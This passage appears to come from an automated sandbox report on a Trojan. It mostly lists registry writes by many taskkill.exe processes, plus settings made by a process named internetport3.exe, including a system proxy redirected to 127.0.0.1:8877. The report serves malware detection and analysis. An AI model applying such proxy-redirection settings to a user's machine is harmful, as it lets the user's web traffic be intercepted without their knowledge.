[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 82 EB 5A CC B3 34 AF 96 15 51 E1 CF 5D A8 5C"

The process taskkill.exe:3308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF D3 AB D4 43 10 B2 45 D5 05 C2 A5 A8 D6 46 CF"

The process taskkill.exe:2600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 0C 0E D7 7C DB 5D FE 12 B4 C3 2C 29 44 2A D9"

The process taskkill.exe:3208 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D EB 38 BE 93 F5 0B 91 15 AF 76 D8 28 AF 24 F6"

The process taskkill.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E D4 F9 90 6D 9D A4 81 24 71 4B F2 A0 87 8F 9F"

The process taskkill.exe:4044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 DF CF 55 6D 8F AC B8 6A 7B D7 F9 8B D1 B6 F9"

The process taskkill.exe:2308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 B7 4F 8D D8 EB 6C 3E 96 1A 3B 49 EF 7B B2 AB"

The process taskkill.exe:4040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 FF DA DB 19 1F DB CD 3B FC B5 64 43 88 B9 0B"

The process taskkill.exe:2780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 B2 35 F1 AD 32 D5 8F E2 71 C0 06 AC B8 14 D9"

The process taskkill.exe:1852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 83 24 81 0D C5 43 0E C6 EA 8F F3 AC 40 B4 6B"

The process taskkill.exe:2304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 95 D8 EE AB 71 F6 CF A7 70 3D E2 B9 97 DF 7F"

The process taskkill.exe:3388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 DE 8B E9 31 62 59 5D 0C 08 8E 33 9F FC 26 AD"

The process taskkill.exe:3008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 DB 97 45 37 54 F8 F2 84 6C 5B 9B 15 F2 77 2D"

The process taskkill.exe:2380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 34 A8 70 DE 6D 25 D7 82 1C E9 F0 64 49 ED 5F"

The process taskkill.exe:2664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 8F C9 0D DE DF 82 02 F6 03 AD 6C 0E B6 66 9B"

The process taskkill.exe:2660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 9E 24 5B 03 7F B4 F1 4D D2 7C 16 2C 8D 6F 5D"

The process taskkill.exe:1652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 57 3C 59 D6 AB 8D E3 42 D9 A6 C2 48 B1 FE 0E"

The process taskkill.exe:2260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 9C 3F DF 8F 26 46 8A 80 28 03 FC D5 7A 17 AF"

The process taskkill.exe:3744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 EF BA 19 E2 3E 42 A7 65 15 E1 07 0B 1E 3E 0E"

The process taskkill.exe:2200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 6F FE 7B E4 D1 DF AC 46 A6 EB BC 22 10 22 A4"

The process taskkill.exe:3584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "06 12 B3 12 8E C6 35 C9 88 69 93 DF 64 4B 40 C8"

The process taskkill.exe:3556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 25 72 64 D0 AB CE 75 23 57 9D 6F 96 A5 0C 93"

The process taskkill.exe:2280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 87 78 79 5F 1D 56 C6 0C A2 E3 7C 11 8F 15 0B"

The process taskkill.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 66 46 5C 56 77 84 4B 56 0E 84 73 A0 27 62 37"

The process taskkill.exe:304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 49 14 C3 A5 D7 6B 03 07 11 6F 34 11 42 7B 8B"

The process taskkill.exe:3508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B 8F C1 D9 CF 60 88 C3 BD D6 0A 97 51 91 16 A6"

The process taskkill.exe:4056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 C6 28 50 B7 1E C1 44 75 3E 4A CE D4 FE 6C 8B"

The process taskkill.exe:2044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 08 03 73 4E 4B 7E 36 DA A7 D0 CC 1C E9 FB AD"

The process taskkill.exe:2576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D F8 89 DA 1F 97 A0 3A 5E 11 47 8A F2 29 4A F7"

The process taskkill.exe:3468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 39 9F 42 B2 31 73 93 7F 2C 90 CF 21 8F C7 9E"

The process taskkill.exe:2376 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D B4 86 A4 9D BB AA 9A F8 18 BE C0 E5 33 96 33"

The process taskkill.exe:432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F 1D 06 52 4E 15 00 41 84 B1 ED 0F 8B EC 76 1A"

The process taskkill.exe:2484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 12 46 77 64 87 89 B2 80 47 9B 15 8E 01 06 0A"

The process taskkill.exe:2616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 19 14 B0 BD 90 AF 05 28 9B 18 5C CB FC D8 3D"

The process taskkill.exe:2596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 8B 95 F1 8B 4B 6C E7 F5 A9 DB A9 09 A1 65 A8"

The process taskkill.exe:2920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 2A 61 84 CD 87 CA 5C B9 AF 2B D8 AA 57 E1 06"

The process taskkill.exe:336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 53 E3 06 EB AC E9 4D FB 04 BF 7E B7 88 0F 54"

The process taskkill.exe:1228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 B9 7F EA 7A 3A 77 DC D1 C0 29 88 9C B2 6D EB"

The process taskkill.exe:2192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 35 18 0E EF DA 67 89 B3 C0 6C 8E 01 78 4B C8"

The process taskkill.exe:3000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 5A 41 41 3F 64 60 06 8E 00 22 C2 65 36 55 FA"

The process taskkill.exe:3168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 13 E4 AA 47 02 F9 5E BB 1B 77 39 FB 9B 72 F4"

The process taskkill.exe:172 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 61 4D 57 7E 2A 31 86 E9 15 AC 6F 1F 30 48 89"

The process taskkill.exe:3452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 79 7C 6B AB 71 7E 5C 59 4E C3 0F 1B E6 78 54"

The process taskkill.exe:484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 40 56 44 14 5A 17 66 A6 60 C1 B2 91 E1 8E 46"

The process taskkill.exe:2056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 3F 5D D9 01 D8 95 6C DD 7B F8 3C 27 D3 36 11"

The process taskkill.exe:2564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 3F 0A 14 59 DC 1C D9 A0 EF 7E A1 1B 10 F2 79"

The process taskkill.exe:3012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 3B 2B D9 08 FD EE 14 E7 18 8F 59 C2 FD 9F DC"

The process taskkill.exe:2368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD D4 CD B9 2D 40 9C 62 0E A3 4B AC 04 52 FA 90"

The process taskkill.exe:3892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 C7 F9 99 43 0B 4F F7 78 78 BE 8A 2E 89 8A D7"

The process taskkill.exe:2680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 23 EB 6A 22 9C D3 76 96 67 A7 A9 C0 9A A7 16"

The process taskkill.exe:3080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 45 E5 48 3D B5 47 66 5E CE 34 62 DF CE 05 B0"

The process taskkill.exe:2116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E CA D4 8A 86 E8 84 02 58 AD D9 58 0B 65 2E 20"

The process taskkill.exe:3600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE 69 68 D7 2D 5D 7D A5 FE D0 43 E4 28 C5 66 30"

The process taskkill.exe:2812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE 4E FA FA 44 F5 8B 54 5E 69 A2 AC 4A 5E FE FB"

The process taskkill.exe:3876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B B1 F0 59 BC C1 81 6F 89 42 4E DB 74 66 A1 9E"

The process taskkill.exe:3524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 E6 7E D9 7A 5B 65 38 B0 9C A9 A9 01 D2 29 37"

The process taskkill.exe:3076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 C3 8F 07 E7 52 8D 5C A5 C2 F0 FD 61 7F 81 86"

The process taskkill.exe:2184 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 DF 74 2D AA E8 32 9A 7D 26 27 E7 9A 6C 73 E9"

The process taskkill.exe:220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 73 15 41 98 1E 4A A9 6E 47 53 F0 A1 65 75 72"

The process taskkill.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 47 F8 A2 90 45 D9 EF 31 BA 5C 45 E1 6E 10 50"

The process taskkill.exe:3200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 1D E7 3F AD 7A 50 35 1E D6 52 25 0E 2D 61 B2"

The process taskkill.exe:2896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 20 CE 45 FE A4 BA 0D 75 76 D9 79 AD F9 EA D4"

The process taskkill.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 29 C3 3F DF 4C 5B 89 C1 EE 3E 8A 90 38 FD 14"

The process taskkill.exe:3500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 3C 8F B0 AF 1C 25 49 96 89 54 1D 57 AB B4 81"

The process taskkill.exe:3964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 3A DB D3 52 A5 31 F7 AD 1F 9E 20 DB 1A F7 04"

The process taskkill.exe:2108 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 89 63 8C 0C D7 24 E2 53 A6 99 0B 38 A8 58 9A"

The process taskkill.exe:2692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 F5 1D 9E EB 02 30 CA DA 49 BC 6D 3A B9 C8 4F"

The process taskkill.exe:2104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 89 24 75 16 83 0B 00 8A 6B 62 76 A1 29 68 26"

The process taskkill.exe:2860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 3A DB CA 16 CE D4 3F CE EC 85 E4 53 6A 06 3F"

The process taskkill.exe:3868 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 3E BE 4F 5C 27 5A 0C 6A E2 33 41 2F E8 BE E4"

The process taskkill.exe:3900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 24 A2 EE 36 3E 55 1A 42 D8 4A C7 E5 FC 79 A8"

The process taskkill.exe:3636 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 54 54 16 72 89 7D 80 16 E8 98 CD 62 5E F8 30"

The process taskkill.exe:2636 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 F9 78 DF B3 04 22 54 0E 1F 22 FB EE 12 F3 F2"

The process taskkill.exe:3632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA E7 7D B7 B7 DD E6 C1 40 06 1A C0 6B BB 65 A0"

The process taskkill.exe:2436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 0F 84 EB FA 48 48 F4 6D 99 43 3A 69 EE BC 20"

The process taskkill.exe:3060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 9D 9C 7F B2 24 7F F0 81 F3 7C E4 8F B1 AC 43"

The process taskkill.exe:236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 15 44 60 63 30 4C A5 1A 39 C1 CF 80 F8 B4 AD"

The process taskkill.exe:4008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 60 C7 D7 FF 7A A8 E7 A1 60 96 35 A9 4C C7 C3"

The process taskkill.exe:2340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 42 D6 DF 35 0C 03 EF DC D5 10 72 12 D0 4E C7"

The process taskkill.exe:1616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 11 D3 E2 D5 64 60 2F 29 0E 4D B2 F3 C3 26 83"

The process taskkill.exe:3432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 E7 80 40 1B D6 1B DE C0 AE 6C 77 DB D6 1F F5"

The process taskkill.exe:4004 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 68 1F 9A 80 5A 22 B7 59 BA 78 C3 1E CC A3 A4"

The process taskkill.exe:3928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 E0 41 B1 05 21 D5 5B C2 56 1C 98 90 94 83 76"

The process taskkill.exe:2744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 70 45 C6 38 79 BA B7 AE 9D A4 51 E9 3B A8 33"

The process taskkill.exe:1560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 29 5D 8B EF AD CC 43 4C 9B FE C4 E7 B2 FE A7"

The process taskkill.exe:2748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A BE CD F9 A3 3A 46 13 6F D6 73 46 3C 67 D2 D4"

The process taskkill.exe:2504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 78 51 CD F6 5D 3A FD FE 1A A8 43 EE D8 A3 60"

The process taskkill.exe:1564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 7E B4 90 2E 1C C1 EA 01 14 C2 44 D9 94 D1 02"

The process taskkill.exe:3624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 EF DA 05 E8 93 09 FB 84 E5 59 B8 A2 15 16 6C"

The process taskkill.exe:2728 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 06 53 53 90 05 85 29 B2 76 BA F5 79 00 E4 B9"

The process taskkill.exe:3356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 12 7C E8 10 75 72 9C 19 E6 D6 7B A5 54 70 6D"

The process taskkill.exe:3932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 FE 41 C0 7B 44 66 0A 88 BB E2 1C 40 75 96 CC"

The process taskkill.exe:3228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B F9 73 9D 0C 7D 9C 59 45 13 36 A3 24 D7 AB 4F"

The process taskkill.exe:2336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC CB D9 D2 E4 C2 C2 92 1F 2B 22 9D 12 13 77 8F"

The process taskkill.exe:3116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 DE AA 95 4D E3 98 13 83 4F F6 A5 7B 09 A5 B5"

The process taskkill.exe:3788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 62 78 DD E7 3A 69 00 D7 2D 45 C9 55 6A E5 E0"

The process taskkill.exe:3548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 86 44 C5 01 F2 CC 33 BA 91 A5 92 24 CA EE 25"

The process taskkill.exe:2084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 0F 77 3D B9 6B 04 53 7B 32 2A B9 5A 32 CA 48"

The process taskkill.exe:2224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C C1 F9 18 E3 67 AF 71 62 6B 1A EA B7 47 51 96"

The process taskkill.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 4E F4 22 5B E3 D6 F6 37 6D C9 8E 38 D5 27 F3"

The process internetport3.exe:1088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 03 00 00 00 28 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 28 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877;"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 7F B8 61 3F 86 24 FD 7F FB 4B BB 2F B8 F0 75"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

